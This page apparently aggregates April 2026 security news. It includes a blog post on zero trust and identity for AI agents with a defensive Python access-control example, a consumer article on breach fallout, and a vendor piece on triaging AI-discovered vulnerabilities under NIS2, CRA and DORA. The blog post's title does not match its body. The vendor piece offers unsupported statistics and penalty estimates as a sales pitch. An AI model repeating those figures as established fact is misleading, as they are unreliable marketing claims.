Technology

Related News

PixerLens and Tata Consultancy Services Partner to Deliver AI-Powered Application Intelligence on TCS SovereignSecure™ Cloud

  • Published date: 2026-04-23 13:14:31


PLEASANTON, Calif., April 23, 2026 /PRNewswire/ -- PixerLens, Inc. announces a strategic partnership with Tata Consultancy Services (TCS) to jointly deliver advanced AI-powered solutions to enterpris… [+4345 chars]

AFCEA International Announces The Cyber Edge Writing Award Winners for 2026

  • AFCEA International
  • Published date: 2026-04-23 13:10:00

Top 3 articles to be published in SIGNAL Magazine

Fairfax, Virginia, April 23, 2026 (GLOBE NEWSWIRE) -- The rise of generative artificial intelligence (GenAI) is transforming the global cybersecurity landscape, affecting how military operations, nat… [+5822 chars]

FM Nirmala Sitharaman meets heads of banks on AI risks following concerns over Anthropic's Mythos

  • PTI
  • Published date: 2026-04-23 11:42:54

Finance Minister Nirmala Sitharaman convened a meeting with bank heads to address Artificial Intelligence (AI) risks, particularly concerning Anthropic's Mythos model and its potential to compromise financial system data security. Banks have been urged to imp…

New Delhi: Finance Minister Nirmala Sitharaman on Thursday met heads of banks on risks related to Artificial Intelligence (AI) following global concerns over Anthropic's Mythos model threatening data… [+1667 chars]

Zero Trust Architecture for Sidecar-Based MCP Servers

  • Published date: 2026-04-23 00:00:00


<p>The post <a href="https://www.gopher.security/blog/zero-trust-architecture-sidecar-mcp-servers">Zero Trust Architecture for Sidecar-Based MCP Servers</a> appeared first on <a href="https://www.gopher.security/blog">Read the Gopher Security's Quantum Safety Blog</a>.</p><h2>The shift toward embodied intelligence in business</h2><p>Ever wonder why most business AI feels like a really smart person trapped in a dark room just shouting answers? It's because we’ve mostly built "brains" that don't have "bodies" to actually do things in the real world. </p><p>When we talk about <strong>embodied intelligence</strong> here, we aren't necessarily talking about shiny metal robots. In a business context, "embodiment" means giving an AI agent digital agency—the ability to interact with and change its environment (like your CRM or cloud infra) rather than just processing text in a vacuum.</p><p>Basically, we are moving from static models—think of a chatbot that just sits there—to <strong>agents</strong> that actually interact with their environment. It’s the difference between reading a book about swimming and actually jumping into the pool to feel the water.</p><ul> <li><strong>Interaction over processing</strong>: Instead of just crunching data, these agents take an action, see what happens, and then adjust. It's a constant loop. 
</li> <li><strong>The feedback loop</strong>: In healthcare, an AI agent might help manage patient schedules by "feeling" out the urgency of requests rather than just following a rigid script.</li> <li><strong>Context is king</strong>: In retail, embodied intelligence means a system that doesn't just track inventory but predicts foot traffic by observing store layouts in real-time.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/6867c628b7f8c49dfe17648d/686ef5ab027b1d23f092b447/developing-embodied-intelligence-learning-evolution/mermaid-diagram-1.svg" alt="Diagram 1"></p><p>I've seen so many projects fail because they try to hard-code every single rule. (<a href="https://www.facebook.com/Danmartell/posts/fiverr-ceo-just-sent-his-employees-the-most-brutally-honest-email-ive-seen-from-/1283584809803653/">Fiverr CEO just sent his employees the most brutally honest email I …</a>) It never works because the business world is too messy. To solve this, we use <strong>evolutionary algorithms</strong>—a specific method where you let the system "evolve" its agentic behaviors through trial and error until it finds the most efficient workflow.</p><blockquote> <p>According to <a href="https://aiindex.stanford.edu/report/">Stanford University’s 2024 AI Index Report</a>, the shift toward "agentic" workflows is becoming the new standard for enterprise efficiency.</p> </blockquote><p>In finance, this looks like automated trading bots that don't just follow one strategy. They use those evolutionary methods to compete against each other in simulations, and only the "fittest" code survives to handle real money. It’s survival of the fittest, but for your tech stack.</p><p>Anyway, it's not just about being smart; it’s about being useful. 
Moving from "thinking" to "doing" is a huge leap for any CEO trying to actually see an ROI.</p><p>Next, we’re gonna dive into the actual "learning" part—how these things get smarter over time without you having to hold their hand.</p><h2>The lifecycle of an evolving AI agent</h2><p>Ever tried teaching a toddler how to use a spoon? It’s a mess of spilled cereal and weird experiments before they actually get it right, and honestly, evolving AI agents aren't much different. They need a safe place to fail where they won't accidentally delete your entire customer database or spend ten grand on ads for a product that doesn't exist yet.</p><p>You can't just throw an agent into the deep end on day one. We use "digital twins" or simulated environments—basically a video game version of your business—where the agent can try things out. If it’s a retail bot, we let it practice on a fake store with fake customers to see if it starts giving away too many discounts.</p><p>Debugging these things is a nightmare because they don't just have "bugs" in the traditional sense; they have "behaviors." When an agent makes a mistake, you have to look back at the training data and the feedback loop to see where it got the wrong idea. It's more like being a psychologist than a coder sometimes.</p><p>For the dev teams, this means moving to a continuous integration model that includes "evals." Every time you update the model, you run it through a battery of tests to make sure it hasn't lost its mind. Gartner mentioned how AI-augmented dev is speeding this up, but you still need a human in the loop to sign off on major changes.</p><p>Once your agent works, you probably want ten more of them, right? But scaling isn't just about copying and pasting code. You need load balancing so one agent doesn't get overwhelmed while the others sit around. 
If a healthcare agent is handling a spike in appointments, the system needs to spin up more "bodies" instantly.</p><p><img decoding="async" src="https://cdn.pseo.one/6867c628b7f8c49dfe17648d/686ef5ab027b1d23f092b447/developing-embodied-intelligence-learning-evolution/mermaid-diagram-3.svg" alt="Diagram 3"></p><p>Fault tolerance is huge here too. If one agent in a decentralized network crashes, the others need to pick up the slack without missing a beat. It’s about building a flexible architecture that doesn't break when one API call fails. </p><p>Anyway, the goal is to create a system that grows with your business, not one that you have to rebuild every six months. Next, we’re gonna look at the infrastructure you need to actually support these evolving agents.</p><h2>Building the infrastructure for evolving agents</h2><p>Building the "body" for an AI agent is honestly a lot harder than just training a model on some text. You can’t just give a brain a set of eyes and expect it to run a warehouse; you need the pipes, the wires, and the plumbing to make it all talk to each other without crashing.</p><p>If you’re trying to run next-gen agents on a tech stack from 2015, you’re gonna have a bad time. Most legacy systems are like old houses with bad wiring—they just can't handle the load of real-time AI processing. (<a href="https://acuvate.com/blog/legacy-factory-systems-fail-real-time-decisions/">Why Legacy Systems Fail Agentic AI &amp; Real-Time Decisions in 2026</a>) </p><p>Firms like <a href="https://technokeens.com/">Technokeens</a> are solving this "legacy bridge" problem by helping businesses with custom software development and cloud consulting. 
They specialize in application modernization, which is basically a fancy way of saying they take your old, clunky databases and bridge them to modern API structures so your agent isn't a genius who can't open the door to the room where the data is kept.</p><ul> <li><strong>Cloud-native is the only way</strong>: You need the elasticity of the cloud because agentic workloads spike like crazy when they start "thinking" through a problem.</li> <li><strong>API-first architecture</strong>: If your systems don't talk to each other via clean APIs, your agents will get stuck in silos.</li> <li><strong>Data liquidity</strong>: This isn't just about speed; it's about breaking down silos. Data liquidity means your agents can access cross-departmental info dynamically—like a retail agent seeing logistics delays and marketing budgets at the same time to adjust a promotion.</li> </ul><p>According to a 2023 report by <a href="https://www.gartner.com/en/newsroom/press-releases/2023-10-16-gartner-identifies-the-top-10-strategic-technology-trends-for-2024">Gartner</a>, nearly 25% of CIOs will be looking at "AI-augmented development" to speed up how they build this very infrastructure. </p><p>Once you have more than one agent, things get chaotic fast. It’s like having five interns who don't talk to each other but all have access to your corporate credit card. You need orchestration to make sure they aren't stepping on each other's toes.</p><p>Diagram 2</p><p>Monitoring is the other big piece. You can't just "set it and forget it" because agents can drift. You need dashboards that track not just if the agent is "up," but if it’s actually doing what it’s supposed to do.</p><p>Next, we’re gonna look at security—because giving an agent a body means giving it the power to break things.</p><h2>Security and Identity in the age of AI agents</h2><p>If you give an AI agent your corporate password and it goes rogue, who do you actually blame? 
It’s a weird question because we're used to securing people, not autonomous "bodies" that can make their own choices at 2 a.m. while we're asleep.</p><p>We can't just treat these agents like another employee with a login. We need a specialized identity and access management (IAM) strategy just for them.</p><ul> <li><strong>Identity for things, not people</strong>: Every agent needs a unique digital identity, almost like a service account but with way more guardrails. </li> <li><strong>RBAC vs ABAC</strong>: Most of us use Role-Based Access Control (RBAC), but for agents, Attribute-Based Access Control (ABAC) is better because the decision can depend on the request itself, not just on who is asking. For example, access is granted only if the agent's security clearance matches the data's sensitivity tag and the transaction originates from a verified IP (treat the IP as a supporting signal rather than the whole decision; addresses get shared behind NAT and spoofed).</li> <li><strong>Zero Trust is mandatory</strong>: You gotta assume the agent's API token will leak eventually. Implementing zero trust means issuing short-lived credentials tied to the agent's identity and making the agent prove who it is, and that it is still allowed to do this, on every single request instead of once per session.</li> </ul><p>According to the Cybersecurity &amp; Infrastructure Security Agency (CISA), moving toward a zero trust architecture is the only way to handle the "expanding attack surface" created by automated systems. </p><p>Honestly, the scariest part of embodied intelligence is the "black box" problem. If a retail bot decides to discount every item in the store by 90%, you need an audit trail to see why it thought that was a good idea. </p><ul> <li><strong>Logging the "Why"</strong>: Traditional logs show <em>what</em> happened. AI logs need to show the reasoning (the "thought process" behind the action) together with the policy decision that allowed or denied it, so you can tell a bad idea from a bad permission. </li> <li><strong>Compliance on autopilot</strong>: Tools can now automate GDPR and SOC2 compliance by watching agent behavior in real-time. </li> <li><strong>Ethical policies</strong>: You need hard-coded "off switches." 
In finance, this might be a circuit breaker that stops an agent if it loses a certain amount of money in under a minute.</li> </ul><blockquote> <p>A 2024 report by <a href="https://www.ibm.com/reports/threat-intelligence">IBM</a> highlights that the average cost of a data breach is hitting record highs, making the "security-first" approach for AI agents a business necessity.</p> </blockquote><p>Anyway, if you don't govern these things, they’ll eventually do something "smart" that is actually incredibly stupid for your bottom line. </p><h2>Real world impact and ROI</h2><p>So, we've spent all this time talking about how these agents "think" and "evolve," but let's be real—your boss only cares if it actually moves the needle on the bottom line. It’s easy to get lost in the tech, but the real magic happens when you see the ROI in places you didn't expect, like marketing or operations.</p><p>Measuring success isn't just about counting how many tickets a bot closed; it's about the quality of the "embodied" experience. </p><ul> <li><strong>KPIs that actually matter</strong>: Instead of just speed, look at "frustration scores." If a marketing agent notices a user hovering over a cancel button and offers a personalized discount in real-time, that's a retention win you can actually measure.</li> <li><strong>Resource optimization</strong>: It’s not about replacing people, it’s about shifting costs. If your AI handles the 80% of grunt work, your human team can focus on the 20% that requires actual creativity.</li> <li><strong>Personalization at scale</strong>: I've seen marketing teams use these agents to "feel out" customer sentiment across thousands of touchpoints, adjusting ad spend on the fly.</li> </ul><p>As mentioned earlier, the cost of data breaches is skyrocketing, so part of your ROI is actually "risk avoidance." 
You're spending money now to make sure you don't lose a fortune later when a dumb bot makes a huge mistake.</p><p><img decoding="async" src="https://cdn.pseo.one/6867c628b7f8c49dfe17648d/686ef5ab027b1d23f092b447/developing-embodied-intelligence-learning-evolution/mermaid-diagram-4.svg" alt="Diagram 4"></p><p>At the end of the day, we're finally giving the "brain in the dark room" a pair of hands and a way to see the world. By moving toward embodied intelligence, businesses stop just shouting answers and start actually solving problems in real-time. If you give these agents the right body, a secure identity, and a safe place to evolve, they stop being a science project and start being the most valuable employees you have. It’s a wild ride, but definitely one worth taking if you want to stay competitive in a world that doesn't slow down.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.gopher.security/blog">Read the Gopher Security's Quantum Safety Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Read the Gopher Security's Quantum Safety Blog">Read the Gopher Security's Quantum Safety Blog</a>. Read the original post at: <a href="https://www.gopher.security/blog/zero-trust-architecture-sidecar-mcp-servers">https://www.gopher.security/blog/zero-trust-architecture-sidecar-mcp-servers</a> </p>
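The per-request ABAC check, the reason-bearing audit trail and the finance circuit breaker that the Security and Identity section above calls for, as an added example in Python. It is not code from the original post or from Gopher Security: the class and function names (AgentIdentity, Resource, ToolCall, PolicyDecisionPoint, LossCircuitBreaker, run_demo), the clearance ladder, the 10.20.0.0/16 "verified" network and the sample tool calls are all constructed for illustration. The source-IP attribute is deliberately the weakest check here; the credential, action and clearance checks run independently of it, and the breaker stays tripped until a human resets it.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
import ipaddress
import json

# Ordered sensitivity labels (assumed): an agent may touch data at or below its clearance.
CLEARANCE_RANK = {"public": 0, "internal": 1, "confidential": 2, "restricted": 3}


@dataclass(frozen=True)
class AgentIdentity:
    """Identity for a thing, not a person: a workload identity with a short-lived credential."""
    agent_id: str
    clearance: str
    allowed_actions: frozenset
    credential_expires_at: datetime


@dataclass(frozen=True)
class Resource:
    name: str
    sensitivity: str  # the data's sensitivity tag


@dataclass(frozen=True)
class ToolCall:
    agent: AgentIdentity
    resource: Resource
    action: str
    source_ip: str
    reasoning: str  # the agent's stated "why", captured so the audit log records it
    at: datetime


class PolicyDecisionPoint:
    """ABAC: every call is evaluated from scratch against agent, resource and context attributes."""

    def __init__(self, verified_networks):
        self.verified_networks = [ipaddress.ip_network(n) for n in verified_networks]
        self.audit_log = []  # JSON lines: what happened, what the agent claimed, why policy decided as it did

    def _source_verified(self, ip):
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in self.verified_networks)

    def authorize(self, call):
        denials = []  # nothing is cached from an earlier decision; each check runs on every call
        if call.at >= call.agent.credential_expires_at:
            denials.append("credential expired")
        if call.action not in call.agent.allowed_actions:
            denials.append(f"action {call.action!r} not granted to this agent")
        if CLEARANCE_RANK[call.agent.clearance] < CLEARANCE_RANK[call.resource.sensitivity]:
            denials.append(f"clearance {call.agent.clearance!r} below sensitivity {call.resource.sensitivity!r}")
        if not self._source_verified(call.source_ip):
            denials.append(f"source {call.source_ip} is not on a verified network")
        allowed = not denials
        self.audit_log.append(json.dumps({
            "ts": call.at.isoformat(), "agent": call.agent.agent_id, "action": call.action,
            "resource": call.resource.name, "source_ip": call.source_ip,
            "agent_reasoning": call.reasoning,
            "decision": "allow" if allowed else "deny", "policy_reasons": denials,
        }))
        return allowed, denials


class LossCircuitBreaker:
    """Hard-coded off switch: trips when realised losses inside a sliding window reach a limit."""

    def __init__(self, max_loss, window):
        self.max_loss = max_loss
        self.window = window
        self.losses = []  # (timestamp, loss amount)
        self.tripped = False  # stays tripped until a human resets it

    def record(self, at, pnl):
        if pnl < 0:
            self.losses.append((at, -pnl))
        cutoff = at - self.window
        self.losses = [(t, amount) for t, amount in self.losses if t >= cutoff]
        if sum(amount for _, amount in self.losses) >= self.max_loss:
            self.tripped = True
        return self.tripped


def run_demo():
    """Constructed sample traffic; returns the decisions so the behaviour can be checked."""
    t0 = datetime(2026, 4, 23, 2, 0, tzinfo=timezone.utc)
    pdp = PolicyDecisionPoint(verified_networks=["10.20.0.0/16"])
    agent = AgentIdentity("retail-pricing-agent", "confidential",
                          frozenset({"read", "update_price"}), t0 + timedelta(minutes=15))
    inventory = Resource("inventory_db", "internal")
    payroll = Resource("payroll_db", "restricted")
    results = {
        "read_inventory": pdp.authorize(ToolCall(agent, inventory, "read", "10.20.5.7", "check stock before discounting", t0)),
        "read_payroll": pdp.authorize(ToolCall(agent, payroll, "read", "10.20.5.7", "need salaries for promo budget", t0)),
        "from_unknown_ip": pdp.authorize(ToolCall(agent, inventory, "read", "203.0.113.9", "check stock", t0)),
        "expired_credential": pdp.authorize(ToolCall(agent, inventory, "update_price", "10.20.5.7", "apply 10% promo", t0 + timedelta(minutes=20))),
    }
    breaker = LossCircuitBreaker(max_loss=500.0, window=timedelta(seconds=60))
    trips = [
        breaker.record(t0, -300.0),                          # 300 inside the window: open
        breaker.record(t0 + timedelta(seconds=70), -300.0),  # first loss aged out, 300 again: open
        breaker.record(t0 + timedelta(seconds=80), -250.0),  # 550 >= 500: tripped
    ]
    return results, trips, pdp.audit_log


if __name__ == "__main__":
    results, trips, log = run_demo()
    for name, (allowed, reasons) in results.items():
        print(f"{name}: {'allow' if allowed else 'deny'} {reasons}")
    print("breaker trips:", trips)
    print("\n".join(log))
```

Every denial carries the attribute that failed, and every log line carries both the agent's own justification and the policy's verdict, which is what lets an investigator separate "the model reasoned badly" from "the permission model was wrong".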

How cyberattacks on companies affect everyone

  • Published date: 2026-04-23 00:00:00


<p>The post <a href="https://www.malwarebytes.com/blog/privacy/2026/04/how-cyberattacks-on-companies-affect-everyone">How cyberattacks on companies affect everyone</a> appeared first on <a href="https://www.malwarebytes.com/">Malwarebytes</a>.</p><p>If you use the internet, you’ve likely been affected by cybercrime in some way. Even when an attack is aimed at a company, the fallout usually lands on ordinary people.</p><p>The most obvious harm is stolen data. When attackers break into a business, it is usually customer information that ends up in criminal hands, and that can lead to <a href="https://www.malwarebytes.com/identity-theft" rel="noreferrer noopener">identity theft</a>, <a href="https://www.malwarebytes.com/blog/privacy/2026/03/your-tax-forms-sell-for-20-on-the-dark-web" rel="noreferrer noopener">tax fraud</a>, <a href="https://www.malwarebytes.com/press/2023/11/14/new-credit-card-skimmer-scam" rel="noreferrer noopener">credit card fraud</a>, and a long tail of scam attempts that can continue for months or years. For consumers, the breach itself is often just the start of the cleanup.</p><p>That work is annoying, time-consuming, and sometimes expensive. People may have to freeze credit, replace cards, change passwords, be on the lookout for suspicious transactions, and dispute charges. The Federal Trade Commission (FTC) specifically <a href="https://www.ftc.gov/media/79862" rel="noreferrer noopener nofollow">advises</a> consumers to use <a href="https://www.identitytheft.gov/databreach" rel="noreferrer noopener nofollow">IdentityTheft.gov</a> after a breach and recommends steps like credit freezes and fraud alerts to reduce the chance of further abuse.</p><p>When sensitive data is exposed, the harm is not only financial. 
Medical, insurance, and other deeply personal records can be used to create more convincing phishing or extortion attempts, and the stress of knowing that private information is circulating among criminals can linger long after the technical incident is over. In other words, breach victims are not just cleaning up a data problem, they are dealing with a loss of trust.</p><p>Cybercrime also hits consumers through service disruption. Ransomware and intrusion campaigns can interrupt payment systems, telecom services, shipping, energy distribution, booking platforms, and other infrastructure people rely on every day. In those cases, the consumer impact is immediate: you may not be able to pay, travel, call, buy, or even work normally. The <a href="https://www.csis.org/programs/strategic-technologies-program/significant-cyber-incidents">CSIS timeline</a> and <a href="https://www.cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2025-2026">Canada’s cyberthreat assessment</a> both show that these disruptions are increasingly tied to high-value targets and can be part of broader state or criminal campaigns.</p><p>Not all these incidents are driven by cybercriminals. Recently, Britain’s cybersecurity chief warned that the <a href="https://therecord.media/UK-cyberattacks-ncsc-china" rel="noreferrer noopener nofollow">UK is handling 4 nationally significant cyberincidents every week</a>, with the majority now traced back to foreign governments rather than cybercriminal groups.</p><p>Another cost is easy to overlook: disinformation and confusion. 
When attackers steal data, disrupt services, or impersonate trusted brands, they can also flood the public with fake support messages, scam calls, refund schemes, and phishing emails pretending to be the breached company. The breach becomes a launchpad for more fraud, and consumers are left trying to separate legitimate notifications from those sent by attackers.</p><p>Then there is the security backlash. After a breach, companies usually tighten access rules, add more multi-factor authentication prompts, force reauthentication, shorten sessions, and increase fraud checks. Those measures are often necessary, but they also make ordinary digital life more cumbersome. The consumer ends up paying with time and frustration for security problems they did not create.</p><p>That is why company-targeted cybercrime is not really only a business problem. It is a consumer issue, a public-trust issue, and sometimes even a national security issue. A single breach can leak data, trigger fraud, interrupt essential services, amplify scams, and make using the internet more frustrating for everyone else. The real cost is rarely confined to the company that got hit.</p><p>Knowing this, it’s worth thinking carefully about which companies to trust with your data and how much you’re willing to share. You cannot stop every attack against every company you deal with, but you can limit the fallout by being more selective. Some considerations:</p><ul class="wp-block-list"> <li>Do they need all the information they are asking for?</li> <li>Would it hurt anything if you leave some fields blank or give less specific answers?</li> <li>Has this company been breached in the past, and how did they handle it?</li> <li>How long will they store the data you provide?</li> <li>Can you easily have your data removed at your request?</li> </ul><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.malwarebytes.com/">Malwarebytes</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Malwarebytes">Malwarebytes</a>. Read the original post at: <a href="https://www.malwarebytes.com/blog/privacy/2026/04/how-cyberattacks-on-companies-affect-everyone">https://www.malwarebytes.com/blog/privacy/2026/04/how-cyberattacks-on-companies-affect-everyone</a> </p>

When Mythos Finds Thousands of Zero-Days, EU Regulators Won’t Wait for Your SOC to Catch Up

  • Published date: 2026-04-23 00:00:00


<p>Mythos vulnerability findings are coming, thousands of them, all at once. When they arrive, your organization’s incident response clock starts immediately. If you’re subject to <a href="https://d3security.com/glossary/nis2-directive/" type="page" id="61361">NIS2</a>, <a href="https://d3security.com/glossary/mythos-nis2/" type="page" id="61444">CRA</a>, or <a href="https://d3security.com/glossary/dora-compliance/" type="page" id="59785">DORA</a> regulations, the compliance deadline is 24 hours, 4 hours, or, in the case of daily penalty accrual, effectively right now. A 10-analyst SOC can process roughly 320 findings in 24 hours. Mythos will likely generate far more than that in a single disclosure event. For EU-regulated organizations, this gap between Mythos scale and manual triage capacity is a compliance failure waiting to happen.</p><p>Every Mythos finding is a regulatory event. Organizations that attempt to manage Mythos findings using traditional vulnerability workflows will miss deadlines, trigger penalties, and expose leadership to personal liability. Regulators care about your response time.</p><p><a href="https://d3security.com/resources/mythos-whitepaper/" type="d3-resource" id="61458">Mythos</a> finds the zero-days. 
The real question is whether your organization can <em>classify, report, and act</em> on thousands of findings before the compliance deadline clock expires, for three separate regulatory frameworks simultaneously.</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading">The Regulatory Triple Threat</h2><p>For EU-regulated organizations, Mythos findings activate multiple compliance obligations in parallel:</p><h3 class="wp-block-heading">NIS2 (<a href="https://eur-lex.europa.eu/eli/dir/2022/2555" rel="noreferrer noopener">Directive 2022/2555</a>)</h3><ul class="wp-block-list"> <li>24-hour early warning to the national CSIRT or competent authority for “significant incidents”</li> <li>72-hour incident notification with an initial assessment, then a final report within one month</li> <li>€10M penalty cap (or 2% of global turnover, whichever is higher) for essential entities; €7M or 1.4% for important entities</li> <li>Personal liability for members of the management body</li> </ul><h3 class="wp-block-heading"><a href="https://digital-strategy.ec.europa.eu/en/policies/cyber-resilience-act" rel="noreferrer noopener">CRA (Cyber Resilience Act</a>, in force since December 2024; its reporting obligations apply from September 2026)</h3><ul class="wp-block-list"> <li>24-hour early warning to <a href="https://www.enisa.europa.eu/" rel="noreferrer noopener">ENISA</a> for an <em>actively exploited</em> vulnerability in a product in scope, followed by a 72-hour notification and a final report; a vulnerability that is merely discovered falls under the manufacturer’s vulnerability-handling duties, not the 24-hour clock</li> <li>Product remediation on an accelerated timeline</li> <li>Penalties up to €15M or 2.5% of global turnover, whichever is higher</li> <li>Risk of product withdrawal or recall from EU markets</li> </ul><h3 class="wp-block-heading">DORA (<a href="https://eur-lex.europa.eu/eli/reg/2022/2554" rel="noreferrer noopener">Digital Operational Resilience Act</a>, applicable since 17 January 2025)</h3><ul class="wp-block-list"> <li>Initial notification within 4 hours of classifying an incident as major, and no later than 24 hours after becoming aware of it</li> <li>Intermediate report within 72 hours and a final report within a month; updates continue while the incident is active</li> <li>Periodic penalty payments that accrue daily (the regulation fixes 1% of average daily worldwide turnover for critical ICT third-party providers; fines for financial entities are set under national law)</li> <li>Escalation triggers within hours (not days)</li> </ul><p>A single Mythos finding affecting a cloud service used by regulated organizations can activate all three frameworks simultaneously. 
Each has its own classification criteria, reporting timeline, and evidence requirements. Your compliance team may not even agree on which regulation takes priority (in practice none does; the clocks run in parallel).</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading">The Math That Breaks Manual Triage</h2><p>The arithmetic is straightforward. It’s also unforgiving.</p><p>A single Mythos disclosure event is expected to surface hundreds to thousands of novel vulnerabilities. Conservative estimates put the number at 500+ findings in a single batch. At 30 minutes per finding for proper triage, assessment, and initial reporting, a reasonable estimate for analyst-driven work, that’s 250 analyst-hours of effort.</p><p>A 10-person security team working an incident has <a href="https://d3security.com/resources/ai-alert-triage-siem-false-positives/" type="d3-resource" id="59893">capacity</a> for roughly:</p><ul class="wp-block-list"> <li>80 findings processed in 4 hours (DORA deadline)</li> <li>320 findings processed in 24 hours (NIS2 deadline); the raw product is 480 (10 analysts × 24 hours × 2 findings per hour), but nobody triages for 24 hours straight</li> </ul><p>Real-world triage speeds decline as incident workload increases. Context switching, stakeholder coordination, and regulatory documentation overhead further compress available time.</p><p><strong>The outcome:</strong> Organizations with typical SOC capacity will miss DORA deadlines 84% of the time and NIS2 deadlines 36% of the time.</p><p>DORA does not fix a per-day fine for financial entities (that is left to national supervisors; the 1%-of-daily-turnover periodic penalty in the regulation applies to critical ICT third-party providers), but the shape of the exposure is the same: if a supervisor imposed a penalty on the order of €10M for every day the incident remains unclassified, a 500-finding event processed at human speed could accumulate more than €50M before the backlog clears.</p><p>Manual triage is financially untenable.</p><p>And Mythos won’t be the only source. OpenAI’s <a href="https://openai.com/index/codex-security-now-in-research-preview/" rel="noreferrer noopener">Codex Security</a> launched in March 2026, scanning 1.2 million commits in 30 days and surfacing over 10,000 high-severity findings. 
Each AI-discovered vulnerability triggers the same NIS2, CRA, and DORA reporting obligations. The compliance math only gets worse. Dedicated analysis of Codex Security’s regulatory impact is forthcoming.</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading">Why This Is Different From Standard Vulnerability Management</h2><p>Your organization already has a vulnerability management program. That program exists to handle CVEs, pre-published, catalogued, and arriving in a measured cadence. Mythos findings break that model.</p><p>EU regulatory frameworks were designed for human-speed disclosure cycles. A vendor publishes a CVE. Your team reads the advisory. Your team checks if you’re affected. You patch or mitigate. The regulatory clock is generous because disclosure has guardrails.</p><p>Mythos findings arrive without guardrails. They’re also richer than CVEs. Each finding includes code-level analysis, verified exploitation steps, contextual severity assessment, and affected version ranges. They’re actionable proof of concept that your systems are vulnerable.</p><p>More critically, the regulatory overlap creates parallel reporting chains. A finding affecting your in-house cloud platform may trigger:</p><ul class="wp-block-list"> <li>An NIS2 “significant incident” classification (requires authority notification)</li> <li>A CRA product recall assessment (requires ENISA notification)</li> <li>A DORA incident report (requires financial regulator notification)</li> </ul><p>Each classification follows different criteria. Each requires separate evidence chains. Each has its own timeline.</p><p>Traditional vulnerability management tools classify based on CVSS score. Regulators classify based on business impact, scope of exposure, and regulatory jurisdiction. The two taxonomies don’t align. 
Manual work is required to bridge the gap.</p><p>At scale, that work becomes impossible in the time available.</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading">How Morpheus AI Closes the Compliance Gap</h2><p>Morpheus AI is built to process vulnerability findings at analyst depth, across multiple findings, in parallel, without human bottlenecks.</p><p><strong>Processes 100% of Mythos findings at <a href="https://d3security.com/morpheus/triage/" type="page" id="54737">L2+ analyst depth</a>.</strong> Morpheus ingests raw finding data and executes the same analysis your most experienced analysts perform: asset identification, business context lookup, exploit validation, scope assessment, and regulatory classification. It processes hundreds of findings simultaneously while your team focuses on decision-making and response execution.</p><p><strong>Auto-classifies against NIS2/CRA/DORA criteria in a single pass.</strong> Each finding is assessed against the classification criteria for all three frameworks. Morpheus determines whether each finding qualifies as a “significant incident” under NIS2, triggers CRA notification obligations, or requires DORA reporting. The output is a structured classification that maps to your regulatory reporting workflows.</p><p><strong><a href="https://d3security.com/resources/contextual-playbook-generation/" type="d3-resource" id="59300">Contextual playbook generation</a> produces regulation-specific reports.</strong> Morpheus generates findings summaries tailored to each regulatory audience. The NIS2 report includes business impact and authority-facing language. The CRA report emphasizes product scope and remediation timeline. The DORA report prioritizes timeline and escalation criteria. 
The same underlying finding produces three regulatory reports without duplication of effort.</p><p><strong><a href="https://d3security.com/morpheus/investigation/" type="page" id="54727">Attack path discovery</a> determines impact scope for all three frameworks.</strong> Mythos findings identify vulnerabilities. Morpheus maps the attack paths those vulnerabilities enable. It determines whether exposure is customer-facing, internal-only, or requires chain exploitation. That impact scope determines regulatory classification and penalty risk.</p><p><strong>800+ <a href="https://d3security.com/morpheus/self-healing-integrations/" type="page" id="58808">self-healing integrations</a> connect to CSIRT/ENISA submission systems.</strong> Once Morpheus classifies a finding and generates the required report, it submits findings to national authorities, ENISA, and financial regulators through existing submission APIs. The human team receives a summary and escalation points, not a to-do list.</p><p><strong><a href="https://d3security.com/resources/dora-compliance-on-autopilot/" type="d3-resource" id="59293">Full audit trail</a> serves as evidence chain for regulators.</strong> Regulatory investigations examine your incident response decisions. Morpheus maintains a timestamped, immutable record of classification decisions, report generation, and submission timing. That record demonstrates compliance with regulatory timelines and decision quality.</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading">A Readiness Framework for EU-Regulated Organizations</h2><p>Preparing for Mythos disclosure requires moving beyond traditional vulnerability management. 
Here’s a phased approach to compliance readiness:</p><h3 class="wp-block-heading">Phase 1: Assess</h3><ul class="wp-block-list"> <li>Map which regulations apply to your organization and products</li> <li>Audit current SOC capacity and triage timelines</li> <li>Identify gaps between current response speed and regulatory deadlines</li> <li>Catalog critical assets and their regulatory scope</li> </ul><h3 class="wp-block-heading">Phase 2: Deploy</h3><ul class="wp-block-list"> <li>Activate <a href="https://d3security.com/ai-soc-platform/" type="page" id="60708">Morpheus AI</a> with NIS2, CRA, and DORA compliance playbooks</li> <li>Configure connections to regulatory submission systems</li> <li>Establish stakeholder workflows for findings that require business decision-making</li> <li>Test compliance reporting with simulated vulnerability scenarios</li> </ul><h3 class="wp-block-heading">Phase 3: Validate</h3><ul class="wp-block-list"> <li>Execute tabletop exercises using realistic Mythos-scale scenarios</li> <li>Verify that regulatory reporting completes within required timelines</li> <li>Audit evidence trails and documentation quality</li> <li>Refine playbooks based on test results</li> </ul><p>Organizations that complete this framework before Mythos arrives will meet compliance deadlines. Organizations that don’t won’t.</p><hr class="wp-block-separator has-alpha-channel-opacity"><blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow"> <p><strong>Pre-Release Advisory:</strong> Mythos has not yet reached general availability. Morpheus AI currently processes vulnerability reports from production scanners. The capabilities described reflect existing architecture applied to expected Mythos data structures. 
